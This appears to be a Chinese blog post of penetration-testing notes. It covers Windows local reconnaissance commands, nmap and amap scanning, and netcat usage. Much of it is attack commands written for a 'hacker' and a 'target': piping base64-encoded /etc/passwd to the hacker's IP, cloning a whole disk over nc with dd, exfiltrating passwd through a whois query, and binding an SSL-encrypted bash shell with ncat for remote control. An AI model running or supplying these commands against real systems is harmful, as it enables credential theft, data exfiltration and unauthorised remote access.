渗透工具使用


信息搜集工具的使用

bitvise远程连接kali

信息搜集:

windows本地信息搜集:

whoami   #查看自己身份
whoami /all   #获取当前域的信息
ipconfig /all     #查看详细ip信息

arp -a     #查看arp表

systeminfo    #查看操作系统信息

echo %PROCESSOR_ARCHITECTURE%    #查看cpu型号

wmic product get name,version  #查看安装软件和版本信息

wmic qfe get Caption,Description,HotFixID,InstalledOn  #查看补丁列表

net user  #查看本地用户

net session  #显示本地和远程的会话

wmic process list brief   #查看进程

net view   #查看内网的共享

远程信息搜集:

网站:
http://seo.chinaz.com/

http://whois.chinaz.com/

活跃主机识别

nmap -sP [网段]   ##活跃主机识别

nping -tcp -p 445 -data [十六进制数据,例如0xab] [目标ip]    #对目标ip的445端口,以tcp的方式发送一串十六进制数据
(可以通过以上方法模拟常见网络攻击,可以测试对方的防御效果)

#zenmap就是nmap的图形界面版本

nmap -sV [目标ip]   #服务指纹识别

amap -bq [目标ip] [端口]    #服务枚举

nc -nvz [ip] 1-65535    #使用windows的nc进行扫描

kali的nc加密传输

2 目标:

cat /etc/passwd | base64 | nc -nv [黑客ip] 3333 -q 1

#/etc/passwd敏感目录
#/etc/shadow敏感目录
#把查看到的结果进行base64加密,将结果通过nc连接黑客的3333端口,传完之后立马退出

1 黑客:

nc -l -p 3333 > kali.txt   #监听3333端口,并将监听到的东西存放到kali.txt里

传输文件
2 目标:

nc -nv [黑客ip] 3333 < [要传的文件] -q 1

1 黑客:

nc -lp 3333 > xx.txt

nc 远程克隆备份linux硬盘:【取证】

黑客(最好也是linux系统):

nc -lp 3333 | dd of=/dev/sda
#o表示on方向,输出

目标:

dd if=/dev/sda | nc -nv [黑客ip] 3333 -q 1
#i表示in方向,输入

nc 其他用法

两台linux系统:

适用于传输小的文件,whois也可以用于payload反弹

目标 (没有nc,需要用合法方法传输)

whois -h [黑客ip] -p 4444 `cat /etc/passwd | base64` 

黑客自己

nc -l -v -p 4444 | sed "s/ //g" | base64 -d 
#自己解码

注意:nc传输内容都是明文的

所以需要ncat

nc加密版ncat

ncat大多数情况在nmap的工具包里

--help查看可用命令

目标(linux。如果是windows系统,bash改成cmd):

ncat -c bash --allow [黑客ip] -vnl 3333 --ssl  
#只允许黑客的ip使用ssl加密去控制它

黑客:

ncat -nv [目标ip] 3333 --ssl 

域环境:

AD(active directiory)活动目录服务器

安装教程:https://www.cnblogs.com/cnjavahome/p/9029665.html

exchange服务器


文章作者: Broken-year
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
  目录